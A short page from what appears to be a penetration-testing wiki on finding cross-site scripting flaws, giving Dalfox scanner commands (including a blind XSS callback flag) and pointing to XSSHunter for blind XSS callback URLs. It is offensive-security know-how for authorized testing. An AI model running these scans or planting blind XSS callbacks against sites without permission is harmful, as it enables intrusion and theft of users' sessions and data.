Pentest List Wiki
  • What is Pentest List Wiki?
  • OFFENSIVE SECURITY
    • External Infrastructure
      • Discovery
        • Email Address Discovery
        • Subdomain Discovery
        • Data Discovery
        • Port & Service Discovery
      • Exploitation
        • Password Spraying
        • Vulnerability Scanning
    • Internal Infrastructure
      • General Discovery
        • AD Attack Path Discovery
        • Port & Service Discovery
      • Credential Discovery
        • Passwords and NetNTLM
        • SAM & LSA secrets
        • NTDS.dit secrets
        • LSASS secrets
        • DCSync
        • DPAPI secrets
      • Movement
        • Credential Spraying
        • SMB Relaying
        • Pass The Hash
      • Infiltration/Exfiltration
        • Pivoting (Proxying)
    • Web Application
      • Discovery
        • Testing API Keys
        • Vulnerability Scan
        • Web Content Discovery
        • Parameter Discovery
        • VHOST Discovery
        • CMS Scanners
      • Exploitation
        • Authentication
          • Email Address Forms
          • AWS Cognito
        • JSON Web Tokens
        • Injection Attacks
          • SQL Injection
          • Cross-Site Scripting
          • HTTP Headers
      • Bypasses
        • Cloudflare Bypass
        • HTTP 403 Bypass
    • Mobile (iOS/Android)
      • iOS
        • IPA Decryption
        • Filesystem Analysis
        • Static Analysis
    • Cloud
      • AWS
        • Vulnerability Scanners
        • S3 Buckets
      • Azure
        • Vulnerability Scanners
        • m365 & Entra ID
  • DEFENSIVE SECURITY
    • Forged Kerberos Tickets
    • Logon Event Visualisation
Powered by GitBook
On this page
  • Standard XSS
  • Dalfox
  • Blind XSS
  • XSSHunter
  1. OFFENSIVE SECURITY
  2. Web Application
  3. Exploitation
  4. Injection Attacks

Cross-Site Scripting

How to exploit cross-site scripting (XSS).

Standard XSS

Dalfox

Dalfox is a powerful open-source XSS scanner and utility focused on automation.

  • https://github.com/hahwul/dalfox

The following command will take a HTTP request saved to a file named HTTPREQUEST and look for XSS, including blind XSS if you use the -b flag with a blind XSS URL.

dalfox file --rawdata HTTPREQUEST -b <blind_xss_link>

The following command will take a URL and look for XSS, including blind XSS if you use the -b flag with a blind XSS URL.

dalfox url URL -b <blind_xss_link>

Blind XSS

XSSHunter

XSSHunter provides a weaponised URL to insert into XSS payloads to test for blind XSS. The easiest way to use XSSHunter, is by using TruffleSecuritys own platform.

  • https://xsshunter.trufflesecurity.com/app/#/

For those that are more security and privacy conscious. You may wish to setup a private instance:

  • https://github.com/trufflesecurity/xsshunter

PreviousSQL InjectionNextHTTP Headers

Last updated 1 year ago